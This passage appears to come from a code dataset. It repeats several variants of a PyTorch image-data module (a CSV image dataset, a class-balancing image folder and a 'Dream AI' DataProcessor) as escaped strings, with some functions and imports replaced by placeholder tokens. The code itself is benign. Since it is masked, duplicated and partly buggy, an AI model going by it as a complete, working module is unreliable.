= self.tfms(sample)\n if self.target_transform:\n target = self.target_transform(target)\n return sample, target\n\n\ndef extract_data(dt):\n x = []\n y = []\n for a, b in dt:\n x.append(a)\n y.append(b)\n return x, y\n\n\ndef listdir_fullpath(d):\n return [os.path.join(d, f) for f in os.listdir(d)]\n\n\ndef get_minorities(df, thresh=0.8):\n c = df.iloc[:, 1].value_counts()\n lc = list(c)\n max_count = lc[0]\n diffs = [(1 - x / max_count) for x in lc]\n diffs = dict((k, v) for k, v in zip(c.keys(), diffs))\n minorities = [c.keys()[x] for x, y in enumerate(lc) if y < thresh *\n max_count]\n return minorities, diffs\n\n\n<function token>\n<function token>\n\n\ndef one_hot(targets, multi=False):\n if multi:\n binerizer = MultiLabelBinarizer()\n dai_1hot = binerizer.fit_transform(targets)\n else:\n binerizer = LabelBinarizer()\n dai_1hot = binerizer.fit_transform(targets)\n return dai_1hot, binerizer.classes_\n\n\n<function token>\n<function token>\n\n\ndef get_img_stats(dataset, sz):\n size = int(len(dataset) * sz)\n i = 0\n imgs = []\n for img, _ in dataset:\n if i > size:\n break\n imgs.append(img)\n i += 1\n imgs_ = torch.stack(imgs, dim=3)\n imgs_ = imgs_.view(3, -1)\n imgs_mean = imgs_.mean(dim=1)\n imgs_std = imgs_.std(dim=1)\n return imgs_mean, imgs_std\n\n\n<function token>\n\n\ndef save_obj(obj, path):\n with open(path, 'wb') as f:\n pickle.dump(obj, f, pickle.HIGHEST_PROTOCOL)\n\n\n<function token>\n\n\nclass DataProcessor:\n\n def __init__(self, data_path=None, train_csv=None, val_csv=None, reg=\n False, tr_name='train', val_name='val', test_name='test', extension\n =None, setup_data=True):\n print('+------------------------------------+')\n print('| Dream AI |')\n print('+------------------------------------+')\n print()\n self.device = torch.device('cuda:0' if torch.cuda.is_available() else\n 'cpu')\n (self.data_path, self.train_csv, self.val_csv, self.reg, self.\n tr_name, self.val_name, self.test_name, self.extension) = (\n data_path, train_csv, val_csv, reg, tr_name, val_name,\n test_name, extension)\n self.obj = False\n self.multi_label = False\n if setup_data:\n 
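# build the split CSVs and task metadata right away; a minimal usage\n # sketch (illustrative only, the path is hypothetical):\n # dp = DataProcessor(data_path='data/')\n # dsets, dls, sizes = dp.get_data(s=(224, 224), bs=32)\n 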
self.set_up_data()\n\n def set_up_data(self, split_size=0.15):\n data_path, train_csv, val_csv, tr_name, val_name, test_name = (self\n .data_path, self.train_csv, self.val_csv, self.tr_name, self.\n val_name, self.test_name)\n if not data_path:\n data_path = os.getcwd() + '/'\n tr_path = os.path.join(data_path, tr_name)\n val_path = os.path.join(data_path, val_name)\n test_path = os.path.join(data_path, test_name)\n if os.path.exists(os.path.join(data_path, tr_name + '.csv')):\n train_csv = tr_name + '.csv'\n if not train_csv:\n print('no')\n train_csv, val_csv, test_csv = self.data_from_paths_to_csv(\n data_path, tr_path, val_path, test_path)\n train_csv_path = os.path.join(data_path, train_csv)\n train_df = pd.read_csv(train_csv_path)\n if 'Unnamed: 0' in train_df.columns:\n train_df = train_df.drop('Unnamed: 0', 1)\n if len(train_df.columns) > 2:\n self.obj = True\n img_names = [str(x) for x in list(train_df.iloc[:, 0])]\n if self.extension:\n img_names = add_extension(img_names, self.extension)\n if val_csv:\n val_csv_path = os.path.join(data_path, val_csv)\n val_df = pd.read_csv(val_csv_path)\n val_targets = list(map(str, list(val_df.iloc[:, 1])))\n if test_csv:\n test_csv_path = os.path.join(data_path, test_csv)\n test_df = pd.read_csv(test_csv_path)\n test_targets = list(map(str, list(test_df.iloc[:, 1])))\n targets = list(map(str, list(train_df.iloc[:, 1])))\n lengths = [len(t) for t in [s.split() for s in targets]]\n self.target_lengths = lengths\n split_targets = [t.split() for t in targets]\n if self.obj:\n print('\\nObject Detection\\n')\n int_targets = [list(map(float, x)) for x in split_targets]\n zero_targets = np.zeros((len(targets), max(lengths)), dtype=int)\n for i, t in enumerate(zero_targets):\n t[len(t) - len(int_targets[i]):] = int_targets[i]\n zero_targets[i] = t\n train_df.iloc[:, 1] = [torch.from_numpy(z).type(torch.\n FloatTensor) for z in zero_targets]\n obj_targets = list(map(str, list(train_df.iloc[:, 2])))\n obj_split_targets = [t.split() for t in obj_targets]\n try:\n obj_split_targets = [list(map(int, x)) for x in\n obj_split_targets]\n except:\n pass\n dai_onehot, onehot_classes = one_hot(obj_split_targets, True)\n c_names = list(onehot_classes)\n class_idx = [[c_names.index(i) for i in c] for c in\n obj_split_targets]\n zero_idx = np.zeros((len(targets), max(lengths) // 4), dtype=int)\n for i, t in enumerate(zero_idx):\n t[len(t) - len(class_idx[i]):] = class_idx[i]\n zero_idx[i] = t\n train_df.iloc[:, 2] = [torch.from_numpy(z).type(torch.\n LongTensor) for z in zero_idx]\n self.data_dir, self.num_classes, self.class_names = data_path, len(\n onehot_classes), onehot_classes\n elif self.reg:\n print('\\nRegression\\n')\n int_targets = [list(map(int, x)) for x in split_targets]\n zero_targets = np.zeros((len(targets), max(lengths)), dtype=int)\n for i, t in enumerate(zero_targets):\n t[len(t) - len(int_targets[i]):] = int_targets[i]\n zero_targets[i] = t\n train_df.iloc[:, 1] = [torch.from_numpy(z).type(torch.\n FloatTensor) for z in zero_targets]\n self.data_dir, self.num_classes, self.class_names = data_path, max(\n lengths), np.unique(zero_targets, axis=1)\n elif lengths[1:] != lengths[:-1]:\n self.multi_label = True\n print('\\nMulti-label Classification\\n')\n try:\n split_targets = [list(map(int, x)) for x in split_targets]\n except:\n pass\n dai_onehot, onehot_classes = one_hot(split_targets, self.\n multi_label)\n train_df.iloc[:, 1] = [torch.from_numpy(x).type(torch.\n FloatTensor) for x in dai_onehot]\n self.data_dir, self.num_classes, 
self.class_names = data_path, len(\n onehot_classes), onehot_classes\n else:\n print('\\nSingle-label Classification\\n')\n unique_targets = list(np.unique(targets))\n target_ids = [unique_targets.index(x) for x in targets]\n train_df.iloc[:, 1] = target_ids\n if val_csv:\n target_ids = [unique_targets.index(x) for x in val_targets]\n val_df.iloc[:, 1] = target_ids\n if test_csv:\n target_ids = [unique_targets.index(x) for x in test_targets]\n test_df.iloc[:, 1] = target_ids\n self.data_dir, self.num_classes, self.class_names = data_path, len(\n unique_targets), unique_targets\n if not val_csv:\n train_df, val_df = split_df(train_df, split_size)\n if not test_csv:\n val_df, test_df = split_df(val_df, split_size)\n tr_images = [str(x) for x in list(train_df.iloc[:, 0])]\n val_images = [str(x) for x in list(val_df.iloc[:, 0])]\n test_images = [str(x) for x in list(test_df.iloc[:, 0])]\n if self.extension:\n tr_images = add_extension(tr_images, self.extension)\n val_images = add_extension(val_images, self.extension)\n test_images = add_extension(test_images, self.extension)\n train_df.iloc[:, 0] = tr_images\n val_df.iloc[:, 0] = val_images\n test_df.iloc[:, 0] = test_images\n train_df.to_csv(os.path.join(data_path, 'train.csv'), index=False)\n val_df.to_csv(os.path.join(data_path, 'val.csv'), index=False)\n test_df.to_csv(os.path.join(data_path, 'test.csv'), index=False)\n self.minorities, self.class_diffs = None, None\n if not self.obj or not self.multi_label:\n self.minorities, self.class_diffs = get_minorities(train_df)\n self.data_dfs = {self.tr_name: train_df, self.val_name: val_df,\n self.test_name: test_df}\n data_dict = {'data_dfs': self.data_dfs, 'data_dir': self.data_dir,\n 'num_classes': self.num_classes, 'class_names': self.\n class_names, 'minorities': self.minorities, 'class_diffs': self\n .class_diffs, 'obj': self.obj, 'multi_label': self.multi_label}\n self.data_dict = data_dict\n return data_dict\n\n def data_from_paths_to_csv(self, data_path, tr_path, val_path=None,\n test_path=None):\n train_df = csv_from_path(tr_path, tr_path)\n train_df.to_csv(os.path.join(data_path, self.tr_name + '.csv'),\n index=False)\n ret = self.tr_name + '.csv', None\n if val_path is not None:\n val_exists = os.path.exists(val_path)\n if val_exists:\n val_df = csv_from_path(val_path, tr_path)\n val_df.to_csv(os.path.join(data_path, self.val_name +\n '.csv'), index=False)\n ret = self.tr_name + '.csv', self.val_name + '.csv'\n if test_path is not None:\n test_exists = os.path.exists(test_path)\n if test_exists:\n test_df = csv_from_path(test_path, tr_path)\n test_df.to_csv(os.path.join(data_path, self.test_name +\n '.csv'), index=False)\n ret = (self.tr_name + '.csv', self.val_name + '.csv', self.\n test_name + '.csv')\n return ret\n\n def get_data(self, data_dict=None, s=(224, 224), dataset=\n my_image_csv_dataset, bs=32, balance=False, tfms=None, bal_tfms=\n None, tta=False, num_workers=4, stats_percentage=0.6):\n self.image_size = s\n if not data_dict:\n data_dict = self.data_dict\n data_dfs, data_dir, minorities, class_diffs, obj, multi_label = (\n data_dict['data_dfs'], data_dict['data_dir'], data_dict[\n 'minorities'], data_dict['class_diffs'], data_dict['obj'],\n data_dict['multi_label'])\n if obj or multi_label:\n balance = False\n if tta:\n tta_tfms = {self.tr_name: transforms.Compose([transforms.\n FiveCrop(s[0]), transforms.Lambda(lambda crops: torch.stack\n ([transforms.ToTensor()(crop) for crop in crops])),\n transforms.Lambda(lambda crops: torch.stack([transforms.\n Normalize([0.485, 
0.456, 0.406], [0.229, 0.224, 0.225])(\n crop) for crop in crops]))]), self.val_name: transforms.\n Compose([transforms.FiveCrop(s[0]), transforms.Lambda(lambda\n crops: torch.stack([transforms.ToTensor()(crop) for crop in\n crops])), transforms.Lambda(lambda crops: torch.stack([\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, \n 0.225])(crop) for crop in crops]))]), self.test_name:\n transforms.Compose([transforms.FiveCrop(s[0]), transforms.\n Lambda(lambda crops: torch.stack([transforms.ToTensor()(\n crop) for crop in crops])), transforms.Lambda(lambda crops:\n torch.stack([transforms.Normalize([0.485, 0.456, 0.406], [\n 0.229, 0.224, 0.225])(crop) for crop in crops]))])}\n else:\n tta_tfms = None\n if not bal_tfms:\n bal_tfms = {self.tr_name: [transforms.RandomHorizontalFlip()],\n self.val_name: None, self.test_name: None}\n else:\n bal_tfms = {self.tr_name: bal_tfms, self.val_name: None, self.\n test_name: None}\n if obj:\n resize_transform = transforms.Resize(s)\n else:\n resize_transform = transforms.Resize(s)\n if not tfms:\n tfms = [resize_transform, transforms.ToTensor(), transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]\n else:\n tfms_temp = [resize_transform, transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, \n 0.225])]\n tfms_temp[1:1] = tfms\n tfms = tfms_temp\n print(tfms)\n data_transforms = {self.tr_name: tfms, self.val_name: [transforms.\n Resize(s), transforms.ToTensor(), transforms.Normalize([0.485, \n 0.456, 0.406], [0.229, 0.224, 0.225])], self.test_name: [\n transforms.Resize(s), transforms.ToTensor(), transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]}\n temp_tfms = [resize_transform, transforms.ToTensor()]\n temp_dataset = dataset(os.path.join(data_dir, self.tr_name),\n data_dfs[self.tr_name], temp_tfms)\n self.img_mean, self.img_std = get_img_stats(temp_dataset,\n stats_percentage)\n data_transforms[self.tr_name][-1].mean, data_transforms[self.tr_name][\n -1].std = self.img_mean, self.img_std\n data_transforms[self.val_name][-1].mean, data_transforms[self.val_name\n ][-1].std = self.img_mean, self.img_std\n data_transforms[self.test_name][-1].mean, data_transforms[self.\n test_name][-1].std = self.img_mean, self.img_std\n if balance:\n image_datasets = {x: dataset(os.path.join(data_dir, self.\n tr_name), data_dfs[x], data_transforms[x], obj, minorities,\n class_diffs, bal_tfms[x]) for x in [self.tr_name, self.\n val_name, self.test_name]}\n else:\n image_datasets = {x: dataset(os.path.join(data_dir, self.\n tr_name), data_dfs[x], data_transforms[x], obj) for x in [\n self.tr_name, self.val_name, self.test_name]}\n dataloaders = {x: torch.utils.data.DataLoader(image_datasets[x],\n batch_size=bs, shuffle=True, num_workers=num_workers) for x in\n [self.tr_name, self.val_name, self.test_name]}\n dataset_sizes = {x: len(image_datasets[x]) for x in [self.tr_name,\n self.val_name, self.test_name]}\n self.image_datasets, self.dataloaders, self.dataset_sizes = (\n image_datasets, dataloaders, dataset_sizes)\n return image_datasets, dataloaders, dataset_sizes\n\n def imshow(self, inp, title=None):\n \"\"\"Imshow for Tensor.\"\"\"\n inp = self.denorm_img(inp)\n plt.imshow(inp)\n if title:\n plt.title(title)\n plt.pause(0.001)\n\n def denorm_img(self, inp, calculate=False):\n inp = inp.numpy().transpose((1, 2, 0))\n if calculate:\n mean = np.mean(inp)\n std = np.std(inp)\n else:\n mean = self.img_mean.numpy()\n std = self.img_std.numpy()\n inp = std * inp + mean\n inp = np.clip(inp, 0, 1)\n 
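# denormalized image, clipped to [0, 1] for display\n 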
return inp\n\n def show_data(self, folder_name='train', size=(64, 64), bs=5):\n self.get_data(size, bs)\n batch = next(iter(self.dataloaders[folder_name]))\n inputs, classes = batch[0], batch[1]\n out = torchvision.utils.make_grid(inputs)\n if self.reg:\n print(classes)\n self.imshow(out, title=[x for x in classes])\n elif self.multi_label:\n self.imshow(out, title=[self.class_names[np.nonzero(x.type(\n torch.LongTensor))] for x in classes])\n else:\n self.imshow(out, title=[self.class_names[x] for x in classes])\n", "<import token>\n\n\nclass my_image_csv_dataset(Dataset):\n\n def __init__(self, data_dir, data, transforms_=None, obj=False,\n minorities=None, diffs=None, bal_tfms=None):\n self.data_dir = data_dir\n self.data = data\n self.transforms_ = transforms_\n self.tfms = None\n self.obj = obj\n self.minorities = minorities\n self.diffs = diffs\n self.bal_tfms = bal_tfms\n assert transforms_ is not None, print('Please pass some transforms.')\n\n def __len__(self):\n return len(self.data)\n\n def __getitem__(self, index):\n img_path = os.path.join(self.data_dir, self.data.iloc[index, 0])\n img = Image.open(img_path)\n img = img.convert('RGB')\n img = torchvision.transforms.functional.to_grayscale(img,\n num_output_channels=3)\n y = self.data.iloc[index, 1]\n if self.minorities and self.bal_tfms:\n if y in self.minorities:\n if hasattr(self.bal_tfms, 'transforms'):\n for tr in self.bal_tfms.transforms:\n tr.p = self.diffs[y]\n l = [self.bal_tfms]\n l.extend(self.transforms_)\n self.tfms = transforms.Compose(l)\n else:\n for t in self.bal_tfms:\n t.p = self.diffs[y]\n self.transforms_[1:1] = self.bal_tfms\n self.tfms = transforms.Compose(self.transforms_)\n else:\n self.tfms = transforms.Compose(self.transforms_)\n else:\n self.tfms = transforms.Compose(self.transforms_)\n x = self.tfms(img)\n if self.obj:\n s = x.size()[1]\n if isinstance(s, tuple):\n s = s[0]\n row_scale = s / img.size[0]\n col_scale = s / img.size[1]\n y = rescale_bbox(y, row_scale, col_scale)\n y.squeeze_()\n y2 = self.data.iloc[index, 2]\n y = y, y2\n return x, y\n\n\nclass my_image_folder(DatasetFolder):\n\n def __init__(self, root, transform=None, target_transform=None, loader=\n default_loader, minorities=None, diffs=None, bal_tfms=None,\n tta_tfms=None):\n super(my_image_folder, self).__init__(root, loader, IMG_EXTENSIONS,\n transform=transform, target_transform=target_transform)\n self.imgs = self.samples\n self.minorities = minorities\n self.diffs = diffs\n self.bal_tfms = bal_tfms\n self.tta_tfms = tta_tfms\n self.tfms = None\n\n def __getitem__(self, index):\n path, target = self.samples[index]\n sample = self.loader(path)\n if self.transform:\n if self.minorities and self.bal_tfms:\n if target in self.minorities:\n if hasattr(self.bal_tfms, 'transforms'):\n for tr in self.bal_tfms.transforms:\n tr.p = self.diffs[target]\n l = [self.bal_tfms]\n l.extend(self.transform)\n self.tfms = transforms.Compose(l)\n else:\n for t in self.bal_tfms:\n t.p = self.diffs[target]\n self.tfms = transforms.Compose(self.bal_tfms + self\n .transform)\n else:\n self.tfms = transforms.Compose(self.transform)\n elif self.tta_tfms:\n self.tfms = self.tta_tfms\n else:\n self.tfms = transforms.Compose(self.transform)\n sample = self.tfms(sample)\n if self.target_transform:\n target = self.target_transform(target)\n return sample, target\n\n\ndef extract_data(dt):\n x = []\n y = []\n for a, b in dt:\n x.append(a)\n y.append(b)\n return x, y\n\n\ndef listdir_fullpath(d):\n return [os.path.join(d, f) for f in os.listdir(d)]\n\n\ndef 
get_minorities(df, thresh=0.8):\n c = df.iloc[:, 1].value_counts()\n lc = list(c)\n max_count = lc[0]\n diffs = [(1 - x / max_count) for x in lc]\n diffs = dict((k, v) for k, v in zip(c.keys(), diffs))\n minorities = [c.keys()[x] for x, y in enumerate(lc) if y < thresh *\n max_count]\n return minorities, diffs\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n\n\ndef get_img_stats(dataset, sz):\n size = int(len(dataset) * sz)\n i = 0\n imgs = []\n for img, _ in dataset:\n if i > size:\n break\n imgs.append(img)\n i += 1\n imgs_ = torch.stack(imgs, dim=3)\n imgs_ = imgs_.view(3, -1)\n imgs_mean = imgs_.mean(dim=1)\n imgs_std = imgs_.std(dim=1)\n return imgs_mean, imgs_std\n\n\n<function token>\n\n\ndef save_obj(obj, path):\n with open(path, 'wb') as f:\n pickle.dump(obj, f, pickle.HIGHEST_PROTOCOL)\n\n\n<function token>\n\n\nclass DataProcessor:\n\n def __init__(self, data_path=None, train_csv=None, val_csv=None, reg=\n False, tr_name='train', val_name='val', test_name='test', extension\n =None, setup_data=True):\n print('+------------------------------------+')\n print('| Dream AI |')\n print('+------------------------------------+')\n print()\n self.device = torch.device('cuda:0' if torch.cuda.is_available() else\n 'cpu')\n (self.data_path, self.train_csv, self.val_csv, self.reg, self.\n tr_name, self.val_name, self.test_name, self.extension) = (\n data_path, train_csv, val_csv, reg, tr_name, val_name,\n test_name, extension)\n self.obj = False\n self.multi_label = False\n if setup_data:\n self.set_up_data()\n\n def set_up_data(self, split_size=0.15):\n data_path, train_csv, val_csv, tr_name, val_name, test_name = (self\n .data_path, self.train_csv, self.val_csv, self.tr_name, self.\n val_name, self.test_name)\n if not data_path:\n data_path = os.getcwd() + '/'\n tr_path = os.path.join(data_path, tr_name)\n val_path = os.path.join(data_path, val_name)\n test_path = os.path.join(data_path, test_name)\n if os.path.exists(os.path.join(data_path, tr_name + '.csv')):\n train_csv = tr_name + '.csv'\n if not train_csv:\n print('no')\n train_csv, val_csv, test_csv = self.data_from_paths_to_csv(\n data_path, tr_path, val_path, test_path)\n train_csv_path = os.path.join(data_path, train_csv)\n train_df = pd.read_csv(train_csv_path)\n if 'Unnamed: 0' in train_df.columns:\n train_df = train_df.drop('Unnamed: 0', 1)\n if len(train_df.columns) > 2:\n self.obj = True\n img_names = [str(x) for x in list(train_df.iloc[:, 0])]\n if self.extension:\n img_names = add_extension(img_names, self.extension)\n if val_csv:\n val_csv_path = os.path.join(data_path, val_csv)\n val_df = pd.read_csv(val_csv_path)\n val_targets = list(map(str, list(val_df.iloc[:, 1])))\n if test_csv:\n test_csv_path = os.path.join(data_path, test_csv)\n test_df = pd.read_csv(test_csv_path)\n test_targets = list(map(str, list(test_df.iloc[:, 1])))\n targets = list(map(str, list(train_df.iloc[:, 1])))\n lengths = [len(t) for t in [s.split() for s in targets]]\n self.target_lengths = lengths\n split_targets = [t.split() for t in targets]\n if self.obj:\n print('\\nObject Detection\\n')\n int_targets = [list(map(float, x)) for x in split_targets]\n zero_targets = np.zeros((len(targets), max(lengths)), dtype=int)\n for i, t in enumerate(zero_targets):\n t[len(t) - len(int_targets[i]):] = int_targets[i]\n zero_targets[i] = t\n train_df.iloc[:, 1] = [torch.from_numpy(z).type(torch.\n FloatTensor) for z in zero_targets]\n obj_targets = list(map(str, list(train_df.iloc[:, 2])))\n obj_split_targets = 
[t.split() for t in obj_targets]\n try:\n obj_split_targets = [list(map(int, x)) for x in\n obj_split_targets]\n except:\n pass\n dai_onehot, onehot_classes = one_hot(obj_split_targets, True)\n c_names = list(onehot_classes)\n class_idx = [[c_names.index(i) for i in c] for c in\n obj_split_targets]\n zero_idx = np.zeros((len(targets), max(lengths) // 4), dtype=int)\n for i, t in enumerate(zero_idx):\n t[len(t) - len(class_idx[i]):] = class_idx[i]\n zero_idx[i] = t\n train_df.iloc[:, 2] = [torch.from_numpy(z).type(torch.\n LongTensor) for z in zero_idx]\n self.data_dir, self.num_classes, self.class_names = data_path, len(\n onehot_classes), onehot_classes\n elif self.reg:\n print('\\nRegression\\n')\n int_targets = [list(map(int, x)) for x in split_targets]\n zero_targets = np.zeros((len(targets), max(lengths)), dtype=int)\n for i, t in enumerate(zero_targets):\n t[len(t) - len(int_targets[i]):] = int_targets[i]\n zero_targets[i] = t\n train_df.iloc[:, 1] = [torch.from_numpy(z).type(torch.\n FloatTensor) for z in zero_targets]\n self.data_dir, self.num_classes, self.class_names = data_path, max(\n lengths), np.unique(zero_targets, axis=1)\n elif lengths[1:] != lengths[:-1]:\n self.multi_label = True\n print('\\nMulti-label Classification\\n')\n try:\n split_targets = [list(map(int, x)) for x in split_targets]\n except:\n pass\n dai_onehot, onehot_classes = one_hot(split_targets, self.\n multi_label)\n train_df.iloc[:, 1] = [torch.from_numpy(x).type(torch.\n FloatTensor) for x in dai_onehot]\n self.data_dir, self.num_classes, self.class_names = data_path, len(\n onehot_classes), onehot_classes\n else:\n print('\\nSingle-label Classification\\n')\n unique_targets = list(np.unique(targets))\n target_ids = [unique_targets.index(x) for x in targets]\n train_df.iloc[:, 1] = target_ids\n if val_csv:\n target_ids = [unique_targets.index(x) for x in val_targets]\n val_df.iloc[:, 1] = target_ids\n if test_csv:\n target_ids = [unique_targets.index(x) for x in test_targets]\n test_df.iloc[:, 1] = target_ids\n self.data_dir, self.num_classes, self.class_names = data_path, len(\n unique_targets), unique_targets\n if not val_csv:\n train_df, val_df = split_df(train_df, split_size)\n if not test_csv:\n val_df, test_df = split_df(val_df, split_size)\n tr_images = [str(x) for x in list(train_df.iloc[:, 0])]\n val_images = [str(x) for x in list(val_df.iloc[:, 0])]\n test_images = [str(x) for x in list(test_df.iloc[:, 0])]\n if self.extension:\n tr_images = add_extension(tr_images, self.extension)\n val_images = add_extension(val_images, self.extension)\n test_images = add_extension(test_images, self.extension)\n train_df.iloc[:, 0] = tr_images\n val_df.iloc[:, 0] = val_images\n test_df.iloc[:, 0] = test_images\n train_df.to_csv(os.path.join(data_path, 'train.csv'), index=False)\n val_df.to_csv(os.path.join(data_path, 'val.csv'), index=False)\n test_df.to_csv(os.path.join(data_path, 'test.csv'), index=False)\n self.minorities, self.class_diffs = None, None\n if not self.obj or not self.multi_label:\n self.minorities, self.class_diffs = get_minorities(train_df)\n self.data_dfs = {self.tr_name: train_df, self.val_name: val_df,\n self.test_name: test_df}\n data_dict = {'data_dfs': self.data_dfs, 'data_dir': self.data_dir,\n 'num_classes': self.num_classes, 'class_names': self.\n class_names, 'minorities': self.minorities, 'class_diffs': self\n .class_diffs, 'obj': self.obj, 'multi_label': self.multi_label}\n self.data_dict = data_dict\n return data_dict\n\n def data_from_paths_to_csv(self, data_path, tr_path, 
val_path=None,\n test_path=None):\n train_df = csv_from_path(tr_path, tr_path)\n train_df.to_csv(os.path.join(data_path, self.tr_name + '.csv'),\n index=False)\n ret = self.tr_name + '.csv', None\n if val_path is not None:\n val_exists = os.path.exists(val_path)\n if val_exists:\n val_df = csv_from_path(val_path, tr_path)\n val_df.to_csv(os.path.join(data_path, self.val_name +\n '.csv'), index=False)\n ret = self.tr_name + '.csv', self.val_name + '.csv'\n if test_path is not None:\n test_exists = os.path.exists(test_path)\n if test_exists:\n test_df = csv_from_path(test_path, tr_path)\n test_df.to_csv(os.path.join(data_path, self.test_name +\n '.csv'), index=False)\n ret = (self.tr_name + '.csv', self.val_name + '.csv', self.\n test_name + '.csv')\n return ret\n\n def get_data(self, data_dict=None, s=(224, 224), dataset=\n my_image_csv_dataset, bs=32, balance=False, tfms=None, bal_tfms=\n None, tta=False, num_workers=4, stats_percentage=0.6):\n self.image_size = s\n if not data_dict:\n data_dict = self.data_dict\n data_dfs, data_dir, minorities, class_diffs, obj, multi_label = (\n data_dict['data_dfs'], data_dict['data_dir'], data_dict[\n 'minorities'], data_dict['class_diffs'], data_dict['obj'],\n data_dict['multi_label'])\n if obj or multi_label:\n balance = False\n if tta:\n tta_tfms = {self.tr_name: transforms.Compose([transforms.\n FiveCrop(s[0]), transforms.Lambda(lambda crops: torch.stack\n ([transforms.ToTensor()(crop) for crop in crops])),\n transforms.Lambda(lambda crops: torch.stack([transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])(\n crop) for crop in crops]))]), self.val_name: transforms.\n Compose([transforms.FiveCrop(s[0]), transforms.Lambda(lambda\n crops: torch.stack([transforms.ToTensor()(crop) for crop in\n crops])), transforms.Lambda(lambda crops: torch.stack([\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, \n 0.225])(crop) for crop in crops]))]), self.test_name:\n transforms.Compose([transforms.FiveCrop(s[0]), transforms.\n Lambda(lambda crops: torch.stack([transforms.ToTensor()(\n crop) for crop in crops])), transforms.Lambda(lambda crops:\n torch.stack([transforms.Normalize([0.485, 0.456, 0.406], [\n 0.229, 0.224, 0.225])(crop) for crop in crops]))])}\n else:\n tta_tfms = None\n if not bal_tfms:\n bal_tfms = {self.tr_name: [transforms.RandomHorizontalFlip()],\n self.val_name: None, self.test_name: None}\n else:\n bal_tfms = {self.tr_name: bal_tfms, self.val_name: None, self.\n test_name: None}\n if obj:\n resize_transform = transforms.Resize(s)\n else:\n resize_transform = transforms.Resize(s)\n if not tfms:\n tfms = [resize_transform, transforms.ToTensor(), transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]\n else:\n tfms_temp = [resize_transform, transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, \n 0.225])]\n tfms_temp[1:1] = tfms\n tfms = tfms_temp\n print(tfms)\n data_transforms = {self.tr_name: tfms, self.val_name: [transforms.\n Resize(s), transforms.ToTensor(), transforms.Normalize([0.485, \n 0.456, 0.406], [0.229, 0.224, 0.225])], self.test_name: [\n transforms.Resize(s), transforms.ToTensor(), transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]}\n temp_tfms = [resize_transform, transforms.ToTensor()]\n temp_dataset = dataset(os.path.join(data_dir, self.tr_name),\n data_dfs[self.tr_name], temp_tfms)\n self.img_mean, self.img_std = get_img_stats(temp_dataset,\n stats_percentage)\n data_transforms[self.tr_name][-1].mean, data_transforms[self.tr_name][\n 
-1].std = self.img_mean, self.img_std\n        data_transforms[self.val_name][-1].mean, data_transforms[self.val_name\n            ][-1].std = self.img_mean, self.img_std\n        data_transforms[self.test_name][-1].mean, data_transforms[self.\n            test_name][-1].std = self.img_mean, self.img_std\n        if balance:\n            image_datasets = {x: dataset(os.path.join(data_dir, self.\n                tr_name), data_dfs[x], data_transforms[x], obj, minorities,\n                class_diffs, bal_tfms[x]) for x in [self.tr_name, self.\n                val_name, self.test_name]}\n        else:\n            image_datasets = {x: dataset(os.path.join(data_dir, self.\n                tr_name), data_dfs[x], data_transforms[x], obj) for x in [\n                self.tr_name, self.val_name, self.test_name]}\n        dataloaders = {x: torch.utils.data.DataLoader(image_datasets[x],\n            batch_size=bs, shuffle=True, num_workers=num_workers) for x in\n            [self.tr_name, self.val_name, self.test_name]}\n        dataset_sizes = {x: len(image_datasets[x]) for x in [self.tr_name,\n            self.val_name, self.test_name]}\n        self.image_datasets, self.dataloaders, self.dataset_sizes = (\n            image_datasets, dataloaders, dataset_sizes)\n        return image_datasets, dataloaders, dataset_sizes\n\n    def imshow(self, inp, title=None):\n        \"\"\"Imshow for Tensor.\"\"\"\n        inp = self.denorm_img(inp)\n        plt.imshow(inp)\n        if title:\n            plt.title(title)\n        plt.pause(0.001)\n\n    def denorm_img(self, inp, calculate=False):\n        inp = inp.numpy().transpose((1, 2, 0))\n        if calculate:\n            mean = np.mean(inp)\n            std = np.std(inp)\n        else:\n            mean = self.img_mean.numpy()\n            std = self.img_std.numpy()\n        inp = std * inp + mean\n        inp = np.clip(inp, 0, 1)\n        return inp\n\n    def show_data(self, folder_name='train', size=(64, 64), bs=5):\n        self.get_data(s=size, bs=bs)\n        batch = next(iter(self.dataloaders[folder_name]))\n        inputs, classes = batch[0], batch[1]\n        out = torchvision.utils.make_grid(inputs)\n        if self.reg:\n            print(classes)\n            self.imshow(out, title=[x for x in classes])\n        elif self.multi_label:\n            self.imshow(out, title=[self.class_names[np.nonzero(x.type(\n                torch.LongTensor))] for x in classes])\n        else:\n            self.imshow(out, title=[self.class_names[x] for x in classes])\n", "<import 
col_scale)\n y.squeeze_()\n y2 = self.data.iloc[index, 2]\n y = y, y2\n return x, y\n\n\nclass my_image_folder(DatasetFolder):\n\n def __init__(self, root, transform=None, target_transform=None, loader=\n default_loader, minorities=None, diffs=None, bal_tfms=None,\n tta_tfms=None):\n super(my_image_folder, self).__init__(root, loader, IMG_EXTENSIONS,\n transform=transform, target_transform=target_transform)\n self.imgs = self.samples\n self.minorities = minorities\n self.diffs = diffs\n self.bal_tfms = bal_tfms\n self.tta_tfms = tta_tfms\n self.tfms = None\n\n def __getitem__(self, index):\n path, target = self.samples[index]\n sample = self.loader(path)\n if self.transform:\n if self.minorities and self.bal_tfms:\n if target in self.minorities:\n if hasattr(self.bal_tfms, 'transforms'):\n for tr in self.bal_tfms.transforms:\n tr.p = self.diffs[target]\n l = [self.bal_tfms]\n l.extend(self.transform)\n self.tfms = transforms.Compose(l)\n else:\n for t in self.bal_tfms:\n t.p = self.diffs[target]\n self.tfms = transforms.Compose(self.bal_tfms + self\n .transform)\n else:\n self.tfms = transforms.Compose(self.transform)\n elif self.tta_tfms:\n self.tfms = self.tta_tfms\n else:\n self.tfms = transforms.Compose(self.transform)\n sample = self.tfms(sample)\n if self.target_transform:\n target = self.target_transform(target)\n return sample, target\n\n\ndef extract_data(dt):\n x = []\n y = []\n for a, b in dt:\n x.append(a)\n y.append(b)\n return x, y\n\n\ndef listdir_fullpath(d):\n return [os.path.join(d, f) for f in os.listdir(d)]\n\n\ndef get_minorities(df, thresh=0.8):\n 